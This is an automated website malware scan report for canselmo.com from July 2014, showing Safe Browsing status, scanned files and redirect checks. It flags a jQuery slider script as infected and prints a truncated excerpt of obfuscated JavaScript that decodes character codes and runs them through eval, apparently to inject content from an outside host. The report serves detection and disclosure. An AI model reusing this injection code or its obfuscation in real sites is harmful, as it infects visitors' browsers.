Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=canselmo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://canselmo.com/ | HTTP/1.1 301 Moved Connection: close Date: Sat, 12 Jul 2014 02:01:09 GMT Location: http://www.canselmo.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=utf-8 Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOzAW7SRl8V08QE0UbnIVX1DVEV3ErhQnJIv3Agb4SoRQ%3D%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOmZ%2BCM6Zc0jnIxuJv7Wr1i4l5tNTSfZL1D3MOhGxDxM7bEAukbezxuQFAuohTpopU%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly | clean |
http://www.canselmo.com/ | 200 OK Content-Length: 18271 Content-Type: text/html | clean |
http://www.canselmo.com/js/tools.js | 200 OK Content-Length: 5894 Content-Type: application/javascript | clean |
http://canselmo.com/js/jquery/jquery-1.4.4.min.js | 200 OK Content-Length: 78601 Content-Type: application/javascript | clean |
http://canselmo.com/js/jquery/jquery.easing.1.3.js | 200 OK Content-Length: 4955 Content-Type: application/javascript | clean |
http://canselmo.com/themes/canselmo/js/tools/treeManagement.js | 200 OK Content-Length: 1995 Content-Type: application/javascript | clean |
http://canselmo.com/js/jquery/jquery.autocomplete.js | 200 OK Content-Length: 19791 Content-Type: application/javascript | clean |
http://canselmo.com/modules/slideric/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 16717 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,58,6d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,58,6d,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,4e,47,47,58,5e,60,65,58,38,63,40,65,6a,6b,58,65,6b,5c,25,5a,66,64,26,5a,65,6b,2 Antivirus reports:
| ||
http://canselmo.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: canselmo.com
Result:
HTTP/1.1 301 Moved
Connection: close
Date: Sat, 12 Jul 2014 02:01:09 GMT
Location: http://www.canselmo.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOzAW7SRl8V08QE0UbnIVX1DVEV3ErhQnJIv3Agb4SoRQ%3D%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly
Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOmZ%2BCM6Zc0jnIxuJv7Wr1i4l5tNTSfZL1D3MOhGxDxM7bEAukbezxuQFAuohTpopU%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly
...0 bytes of data.
GET / HTTP/1.1
Host: canselmo.com
Result:
HTTP/1.1 301 Moved
Connection: close
Date: Sat, 12 Jul 2014 02:01:09 GMT
Location: http://www.canselmo.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=utf-8
Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOzAW7SRl8V08QE0UbnIVX1DVEV3ErhQnJIv3Agb4SoRQ%3D%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly
Set-Cookie: 753c76477493266c70c1eec3900e5b7c=MSg%2FcxeaivbxcNrXzYkDR11FihGEjA5b63fBns3RpmOmZ%2BCM6Zc0jnIxuJv7Wr1i4l5tNTSfZL1D3MOhGxDxM7bEAukbezxuQFAuohTpopU%3D; expires=Fri, 01-Aug-2014 02:01:09 GMT; path=/; domain=canselmo.com; httponly
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: canselmo.com
Referer: http://www.google.com/search?q=canselmo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: canselmo.com
Referer: http://www.google.com/search?q=canselmo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.